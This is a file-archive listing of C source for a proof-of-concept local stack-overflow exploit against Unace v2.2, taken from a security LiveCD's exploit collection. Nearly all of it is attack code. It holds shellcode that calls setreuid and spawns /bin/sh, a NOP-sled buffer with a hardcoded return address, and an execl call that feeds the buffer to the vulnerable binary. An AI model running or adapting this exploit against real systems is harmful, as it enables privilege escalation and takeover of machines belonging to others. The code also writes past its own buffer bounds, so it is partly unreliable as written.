home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / packer / unace / gEEk-unace.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.3 KB  |  70 lines
  1. /* gEEk-unace.c
  2.  *
  3.  * PoC exploit made for advisory based uppon an local stack based overflow.
  4.  * Vulnerable versions, maybe also prior versions:
  5.  *
  6.  * Unace v2.2
  7.  *
  8.  * Tested on:  Debian 3.0
  9.  *
  10.  * Advisory source: MegaHz
  11.  * http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
  12.  *
  13.  * -----------------------------------------
  14.  * coded by: demz (geekz.nl) (demz@geekz.nl)
  15.  * -----------------------------------------
  16.  *
  17.  */
  18.  
  19. #include <stdio.h>
  20. #include <stdlib.h>
  21.  
  22. char shellcode[]=
  23.  
  24.         "\x31\xc0"                      // xor          eax, eax
  25.         "\x31\xdb"                      // xor          ebx, ebx
  26.         "\x31\xc9"                      // xor          ecx, ecx
  27.         "\xb0\x46"                      // mov          al, 70
  28.         "\xcd\x80"                      // int          0x80
  29.  
  30.         "\x31\xc0"                      // xor          eax, eax
  31.         "\x50"                          // push         eax
  32.         "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e
  33.         "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f
  34.         "\x89\xe3"                      // mov          ebx, esp
  35.         "\x50"                          // push         eax
  36.         "\x53"                          // push         ebx
  37.         "\x89\xe1"                      // mov          ecx, esp
  38.         "\x99"                          // cdq
  39.         "\xb0\x0b"                      // mov          al, 11
  40.         "\xcd\x80"                      // int          0x80
  41.  
  42.         "\x31\xc0"                      // xor          eax, eax
  43.         "\xb0\x01"                      // mov          al, 1
  44.         "\xcd\x80";                     // int          0x80
  45.  
  46. int main()
  47. {
  48.         unsigned long ret = 0xbfffc260;
  49.  
  50.         char buffer[707];
  51.         int i=0;
  52.  
  53.         memset(buffer, 0x90, sizeof(buffer));
  54.  
  55.         for (0; i < strlen(shellcode) - 1;i++)
  56.         buffer[300 + i] = shellcode[i];
  57.  
  58.         buffer[707] = (ret & 0x000000ff);
  59.         buffer[708] = (ret & 0x0000ff00) >> 8;
  60.         buffer[709] = (ret & 0x00ff0000) >> 16;
  61.         buffer[710] = (ret & 0xff000000) >> 24;
  62.         buffer[711] = 0x0;
  63.  
  64.         printf("\nUnace v2.2 local exploit\n");
  65.         printf("---------------------------------------- demz @ geekz.nl --\n");
  66.  
  67.         execl("./unace", "unace", "e", buffer, NULL);
  68. }
  69.  
  70.